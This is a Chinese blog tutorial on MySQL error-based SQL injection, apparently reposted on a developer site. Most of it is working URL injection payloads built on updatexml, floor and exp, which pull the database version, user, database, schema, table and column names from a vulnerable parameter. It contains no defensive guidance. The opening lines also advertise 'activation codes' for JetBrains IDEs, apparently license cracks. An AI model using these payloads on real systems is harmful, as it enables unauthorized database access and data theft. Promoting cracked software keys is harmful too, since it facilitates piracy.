1. 全栈程序员必看首页

mysql报错注入_mysql报错注入[通俗易懂]

全栈程序员-站长 未分类 阅读 4

mysql报错注入_mysql报错注入[通俗易懂]报错注入这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexml、floor和exp。1.updatexmlupdatexml的报错原理从本质上来说就是函数的报错。selectupdatexml(1,concat(0x7e,(selectversion()),0x7e),1);这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:爆破数据库版本信息?id=1’+…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

报错注入

这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexml、floor和exp。

1.updatexml

updatexml的报错原理从本质上来说就是函数的报错。

select updatexml(1,concat(0x7e,(select version()),0x7e),1);

这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:

爆破数据库版本信息

?id=1′ +updatexml(1,concat(0x7e,(select version()),0x7e),1)%23

?id=1′ and updatexml(1,concat(0x7e,(select version()),0x7e),1) –+

其中0x7e是ASCII编码,解码结果。

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前用户

?id=1′ and updatexml(1,concat(0x7e,(select user()),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前使用的数据库

?id=1′ and updatexml(1,concat(0x7e,(select database()),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

爆破数据库中的库名

?id=1′ and updatexml(1,concat(0x7e,(select schema_nme from information_schema.schemata limit 0,1),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

爆破表名

?id=1′ and updatexml(1,concat(0x7e,(select table_nme from information_schema.tables where table_schema= ‘test’ limit 0,1),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

其他功能的Payload可以参照下面floor的使用方法来修改。

2.floor

爆破数据库版本信息

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前用户

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前使用的数据库

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

爆破指定表的字段(下面以表名为emails举例说明)

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e) from information_schema.columns where table_name=0x656d61696c73 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

注意,这里我们采用的是十六进制编码后的表名。如果想采用非十六进制编码的表名则需要添加引号,但是这时候有可能会出现单引号导致的报错。

这这里,我们只演示爆破数据库版本的Payload,关于其他Payload,可自行研究并复现。

3.exp

接下来是exp函数报错,exp()报错的本质原因是报错。我们可以在MySQL中进行。

select exp(~(select * from (select user())x));

同样使用前面的例子,Payload为。

?id=1′ and exp(~(select * from (select user())x))%23

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/187426.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • 数据结构之二叉树的前序遍历、中序遍历、后序遍历、层序遍历「建议收藏」

    数据结构之二叉树的前序遍历、中序遍历、后序遍历、层序遍历「建议收藏」

    数据结构之二叉树的前序遍历、中序遍历、后序遍历、层序遍历「建议收藏」最近也是在准备笔试,由于没有系统的学过数据结构,所以每次在考到二叉树的遍历的时候都是直接跪,次数多了也就怒了,前些天也是准备论文没时间整这些,现在提交了,算是稍微轻松点了,所以花了半天的时间来学了下二叉树。现在记下来,以便后序查阅。一、二叉树的遍历概念  1. 二叉树的遍历是指从根结点触发,按照某种次序依次访问二叉树中所有结点,使得每个结点被访问一次且仅被访问一次。(1).前(

    全栈程序员-站长的头像 全栈程序员-站长
    2025年11月17日
    6
  • MySQL在大数据Limit使用[通俗易懂]

    MySQL在大数据Limit使用[通俗易懂]

    MySQL在大数据Limit使用

    全栈程序员-站长的头像 全栈程序员-站长
    2022年1月17日
    52
  • docker 镜像构建_dockerfile指定镜像名称 docker

    docker 镜像构建_dockerfile指定镜像名称

    docker 镜像构建_dockerfile指定镜像名称前言如果我们已经安装了一个python3的环境,如果另一台机器也需要安装同样的环境又要敲一遍,很麻烦,这里可以配置Dockerfile文件,让其自动安装,类似shell脚本Dockerfile编写

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月31日
    58
  • linux fstab 远程,linux下fstab文件详解[通俗易懂]

    linux fstab 远程,linux下fstab文件详解[通俗易懂]

    linux fstab 远程,linux下fstab文件详解[通俗易懂]1./etc/fstab文件介绍/etc/fstab是用来存放文件系统的静态信息的文件。位于/etc/目录下,可以用命令less/etc/fstab来查看,如果要修改的话,则用命令vi/etc/fstab来修改。当系统启动的时候,系统会自动地从这个文件读取信息,并且会自动将此文件中指定的文件系统挂载到指定的目录。2.fstab文件示例以下是CentOS5.Xfstab文件:#LABEL…

    全栈程序员-站长的头像 全栈程序员-站长
    2025年5月31日
    3
  • hibernate sql查询_sql server查询命令

    hibernate sql查询_sql server查询命令

    hibernate sql查询_sql server查询命令一.SQLQuery简介SQLQuery接口用于接受一个sql语句进行查询,然后调用list()或uniqueResult()进行查询。但是sql语句不会直接封装到实体对象里,需要手写代码才可以封装到实体中。二.SQLQuery常用接口方法addEntity()方法:该方法用于将查询到的结果集转换为你设置的实体类setter()方法:Query接口中提供了一系列的setter方法用于设置…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月30日
    3
  • Axure导航二级菜单[通俗易懂]

    Axure导航二级菜单[通俗易懂]

    Axure导航二级菜单[通俗易懂]    效果:当鼠标移入或者单击“权限管理”时,“权限管理”填充色由蓝变为白,字体由白变成黑。同时,弹出两个子选项“账号管理”和“设备管理”,当鼠标移入子选项时,该子选项背景变为灰白色。当鼠标移出母选项和子选项时,弹框隐藏,同时母选项背景和字体颜色恢复原状。原型设计:(1)设置元件的选中状态(2)设置鼠标移入或移出该组件的事件为了更好设计逻辑,我们采用触发的方式,新…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月18日
    42

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号